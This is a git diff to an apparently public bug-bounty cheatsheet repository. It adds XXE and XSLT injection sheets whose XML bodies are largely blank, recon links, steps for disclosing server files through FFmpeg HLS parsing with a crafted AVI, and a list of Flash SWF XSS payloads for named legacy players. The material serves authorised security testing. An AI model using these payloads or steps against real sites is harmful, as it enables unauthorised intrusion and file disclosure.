diff --git a/README.md b/README.md
index fb7d14c..921f75d 100644
--- a/README.md
+++ b/README.md
@@ -10,11 +10,13 @@
- [CRLF Injection || HTTP Response Splitting](cheatsheets/crlf.md)
- [CSV Injection](cheatsheets/csv-injection.md)
- [LFI](cheatsheets/lfi.md)
+- [XXE](cheatsheets/xxe.md)
- [RCE](cheatsheets/rce.md)
- [Open Redirect](cheatsheets/open-redirect.md)
- [Crypto](cheatsheets/crypto.md)
- [Template Injection](cheatsheets/template-injection.md)
- [Content Injection](cheatsheets/content-injection.md)
+- [XSLT Injection](cheatsheets/xslt.md)
# Contributing
@@ -49,3 +51,5 @@ We like to keep our Markdown files as uniform as possible. So if you submit a PR
- [jon_bottarini](https://github.com/BlueTower)
- [sp1d3r](https://github.com/sp1d3r)
- [yasinS](https://github.com/yasinS)
+- [neutrinoguy](https://github.com/neutrinoguy)
+- [kuromatae](https://github.com/kuromatae)
diff --git a/cheatsheets/bugbountyplatforms.md b/cheatsheets/bugbountyplatforms.md
index 82a89f4..52f0e09 100644
--- a/cheatsheets/bugbountyplatforms.md
+++ b/cheatsheets/bugbountyplatforms.md
@@ -8,3 +8,4 @@
- [BountyFactory](https://bountyfactory.io/)
- [Intigriti](https://intigriti.be/)
- [Bugbountyjp](https://bugbounty.jp/)
+- [Yogosha](https://www.yogosha.com/)
diff --git a/cheatsheets/lfi.md b/cheatsheets/lfi.md
index 36c0501..4233520 100644
--- a/cheatsheets/lfi.md
+++ b/cheatsheets/lfi.md
@@ -21,3 +21,17 @@
```
/%5c..
```
+
+**FFmpeg Local File Disclosure**
+
+This [script](https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py) by @neex can be used to disclose local files on FFmpeg hosts which parse externally-referencing [HLS playlists](https://ffmpeg.org/ffmpeg-formats.html#hls-2).
+
+_Steps to reproduce_
+
+1. Please download the script from @neex to your "attacker" instance
+2. Execute the script with your desired parameters: `python3 gen_xbin_avi.py file:///etc/hostname bugbounty.avi`
+3. Upload the generated AVI file to your target site (e.g. within a 'video upload page')
+4. The target may process the malicious HLS inclusion with FFmpeg on the server-side.
+5. Play the uploaded AVI via the target site. If successful, your desired file will be disclosed within the video.
+
+Alternative scripts exist which may generate different HLS formats or lead to the desired file being disclosed in a different manner.
diff --git a/cheatsheets/special-tools.md b/cheatsheets/special-tools.md
index c45896e..a354f6a 100644
--- a/cheatsheets/special-tools.md
+++ b/cheatsheets/special-tools.md
@@ -30,7 +30,14 @@ otherapp.10.0.0.1.nip.io
**Reconnaissance**
+- https://dnsdumpster.com (DNS and subdomain recon)
+- http://threatcrowd.org (WHOIS, DNS, email, and subdomain recon)
+- https://mxtoolbox.com (wide range of DNS-related recon tools)
- https://publicwww.com/ (Source Code Search Engine)
+- [HackerTarget Tools](https://hackertarget.com/ip-tools/) (DNS recon, site lookup, and scanning tools)
+- [VirusTotal](https://virustotal.com/en-gb/domain/google.com/information/) (WHOIS, DNS, and subdomain recon)
+- [crt.sh](https://crt.sh/?q=%25.uber.com) (SSL certificate search)
+- [Google CT](https://transparencyreport.google.com/https/certificates) (SSL certificate transparency search)
**Report Templates**
diff --git a/cheatsheets/xslt.md b/cheatsheets/xslt.md
new file mode 100644
index 0000000..5fb2a1d
--- /dev/null
+++ b/cheatsheets/xslt.md
@@ -0,0 +1,25 @@
+## XSLT Injection
+
+**Backend infos**
+
+```xml
+
+
+
+ xsl:vendor =
+ xsl:version =
+
+
+```
+
+**Injecting in PHP**
+
+```xml
+
+
+
+
+
+
+```
+
diff --git a/cheatsheets/xss.md b/cheatsheets/xss.md
index e62354b..9fd8b26 100644
--- a/cheatsheets/xss.md
+++ b/cheatsheets/xss.md
@@ -110,6 +110,34 @@ javas cript://www.google.com/%0Aalert(1)
[a](javascript:window.onerror=confirm;throw%201)
```
+**Flash SWF XSS**
+
+- ZeroClipboard: `ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf`
+
+- plUpload Player: `plupload.flash.swf?%#target%g=alert&uid%g=XSS&`
+
+- plUpload MoxiePlayer: `Moxie.swf?target%g=confirm&uid%g=XSS` (also works with `Moxie.cdn.swf` and other variants)
+
+- FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert`1`
+
+- videoJS: `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29`
+
+- YUI "io.swf": `io.swf?yid=\"));}catch(e){alert(document.domain);}//`
+
+- YUI "uploader.swf": `uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<`
+
+- Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()`
+
+- Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//`
+
+- JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)`
+
+- SWFUpload 2.2.0.1: `swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//`
+
+- FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf`
+
+_Note: Useful reference on SWF XSS construction from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._
+
**Lightweight Markup Languages**
**RubyDoc** (.rdoc)
diff --git a/cheatsheets/xxe.md b/cheatsheets/xxe.md
new file mode 100644
index 0000000..49ea531
--- /dev/null
+++ b/cheatsheets/xxe.md
@@ -0,0 +1,59 @@
+**LFI Test**
+```
+
+
+]>&xxe;
+```
+
+**Blind LFI test (when first case doesn't return anything)**
+```
+
+
+
+]>&blind;
+```
+
+**Access Control bypass (loading restricted resources - PHP example)**
+```
+
+]>
+∾
+```
+
+**SSRF Test**
+```
+
+
+]>&xxe;
+```
+
+**XEE (XML Entity Expansion - DOS)**
+```
+
+
+
+
+
+
+
+
+
+
+
+
+]>
+&lol9;
+```
+
+**XEE #2 (Remote attack - through external xml inclusion)**
+```
+
+]>
+3..2..1...&test
+```